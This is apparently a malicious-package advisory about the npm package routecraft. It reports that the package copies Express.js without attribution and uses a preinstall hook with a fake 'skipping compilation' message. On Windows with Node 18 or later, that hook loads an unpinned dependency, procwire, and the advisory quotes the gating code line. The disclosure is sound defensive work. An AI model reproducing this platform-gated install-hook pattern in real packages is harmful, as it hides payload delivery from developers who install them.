
MAL-2026-6229

Malicious code in routecraft (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (a0c4f17a9e94ab9fdbab7325f597551a6c0ba5b9e210cb0b7e28d3b86b4766d0)

routecraft@4.2.0 ships verbatim Express.js source (lib/routecraft.js, lib/application.js, lib/request.js, lib/response.js, lib/utils.js, lib/view.js: same layout, comments, and exports, including createApplication, Router, and the json/raw/text/urlencoded/static middleware) under a different package name and author, with no Express attribution, and presents itself as an original "lightweight HTTP routing framework".

package.json declares `"preinstall": "node ./lib/configure.js"`. lib/configure.js performs no compilation despite logging `...Skipping native addon compilation`; the package ships no native sources (no binding.gyp, no .cc, .cpp or .rs files). Instead, lines 10-12 contain `if (os.platform() === 'win32' && v >= 18) { require('procwire'); }`, which loads the obscure `procwire` dependency (declared as `^1.3.0`) only on Windows with Node >= 18.

The false cover story, the platform gate, and the delegation of the executed code to an unpinned transitive dependency together form the standard pattern for shifting a malicious payload off the parent package: the routecraft tarball itself carries no payload and appears clean, while installers on Windows execute whatever version of procwire the `^1.3.0` range resolves to at install time.


Affected packages

npm / routecraft

No fixed version has been published for routecraft (npm). Because this entry describes malicious code rather than a bug, and the package's non-malicious content is a copy of Express.js, removing routecraft and depending on express directly is the safer course; pin to a known-safe routecraft version only if one has been verified.
